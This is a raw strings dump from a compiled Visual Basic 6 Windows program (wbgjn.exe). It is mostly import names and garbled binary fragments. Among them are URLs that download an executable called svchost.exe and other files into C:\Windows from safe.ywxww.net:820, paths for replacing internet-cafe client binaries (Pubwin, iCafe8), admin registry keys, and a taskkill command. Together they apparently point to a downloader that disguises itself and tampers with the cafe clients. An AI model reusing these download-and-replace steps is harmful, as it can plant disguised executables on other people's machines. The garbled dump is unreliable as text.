!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
Picture1
vb6chs.dll
Module1
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Picture1
shell32.dll
ShellExecuteA
urlmon
URLDownloadToFileA
shlwapi.dll
PathFileExistsA
user32
keybd_event
SystemParametersInfoA
FindWindowA
IsWindowVisible
IsIconic
kernel32
CreateWaitableTimerA
OpenWaitableTimerA
SetWaitableTimer
CancelWaitableTimer
CloseHandle
WaitForSingleObject
MsgWaitForMultipleObjects
hKm0R(u7b{vF
VBA6.DLL
__vbaObjSetAddref
__vbaVarAdd
__vbaStrToUnicode
__vbaVarForNext
__vbaFpI4
__vbaStrVarMove
__vbaVarForInit
__vbaR8IntI2
__vbaStrVarVal
__vbaVarCat
__vbaOnError
__vbaEnd
__vbaFreeStr
__vbaPrintFile
__vbaVarTstGt
__vbaFileClose
__vbaStrCat
__vbaLineInputVar
__vbaFileOpen
__vbaFreeObjList
__vbaNew2
__vbaStrI2
__vbaStrMove
__vbaFreeStrList
__vbaSetSystemError
__vbaStrToAnsi
__vbaStrCopy
__vbaVarCopy
__vbaVarMove
__vbaNextEachVar
__vbaVarTstNe
__vbaHresultCheckObj
__vbaFreeVar
__vbaFreeObj
__vbaAryUnlock
__vbaExitProc
__vbaVarSetObjAddref
__vbaUnkVar
__vbaObjIs
__vbaVarLateMemCallLdRf
__vbaInStrVar
__vbaForEachVar
__vbaVarLateMemCallLd
__vbaFreeVarList
__vbaVarDup
__vbaVarSetVar
__vbaErrorOverflow
__vbaStrR8
__vbaR8Str
__vbaFPFix
__vbaObjSet
jLh$=@
j$h$=@
j,h$=@
jDh$=@
MSVBVM60.DLL
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaNextEachVar
__vbaFreeObjList
__vbaLineInputVar
_adj_fprem1
__vbaStrCat
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaFPFix
_CIsin
__vbaChkstk
__vbaFileClose
EVENT_SINK_AddRef
DllFunctionCall
_adj_fpatan
__vbaStrR8
EVENT_SINK_Release
_CIsqrt
__vbaObjIs
EVENT_SINK_QueryInterface
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaInStrVar
__vbaStrVarVal
__vbaVarCat
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaR8Str
__vbaVarLateMemCallLdRf
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaVarAdd
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaUnkVar
__vbaVarCopy
__vbaFpI4
__vbaVarSetObjAddref
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaForEachVar
_allmul
_CItan
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaFreeObj
__vbaFreeStr
@*\AD:\vbfiles\
\xww.vbp
WinMgmts:
Win32_Process
InstancesOf
Description
Wscript.Shell
scripting.filesystemobject
C:\Windows\system\netbar.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop
RegRead
drives
HKLM\SYSTEM\CurrentControlSet\superadmin
HKLM\SYSTEM\CurrentControlSet\iCafe8\admin
Z:\NBMSClient\BarClientTask.exe
HKLM\SYSTEM\CurrentControlSet\zhaohuan\admin
HKLM\SYSTEM\CurrentControlSet\services\client start\start
C:\Program Files (x86)\HintSoft\PubwinClient\PubwinClient.exe
c:\windows\syswow64\clsmn.exe
Z:\NBMSClient\BarClientView.exe
z:\app\bd.ini
c:\windows\svchost.exe
c:\windows\syswow64\cltupdate.exe
c:\windows\syswow64\cltupdate.exeback
z:\app\pubwinol\cltupdate.exe
y:\app\pubwinol\cltupdate.exe
x:\app\pubwinol\cltupdate.exe
z:\app\pubwinol\clsmn.exe
y:\app\pubwinol\clsmn.exe
x:\app\pubwinol\clsmn.exe
c:\windows\syswow64\clsmn.exeback
z:\app\xwbgj7\xwbgj.exe
http://safe.ywxww.net:820/wbgj.txt
c:\windows\wbgj.txt
http://safe.ywxww.net:820/wbgjupdate.exe
c:\windows\wbgjupdate.exe
c:\windows\fn.txt
c:\windows\fp.txt
c:\windows\ywlog.tmp
c:\windows\syswow64\
\xconfig.ini
http://safe.ywxww.net:820/svchost.exe
http://safe.ywxww.net:820/xconfig.txt
pubwin ol
taskkill /f /IM "xwbgj.exe"
[clsWaitableTimer.Wait]
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
080404B0
CompanyName
ProductName
FileVersion
1.00.0006
ProductVersion
1.00.0006
InternalName
OriginalFilename
wbgjn.exe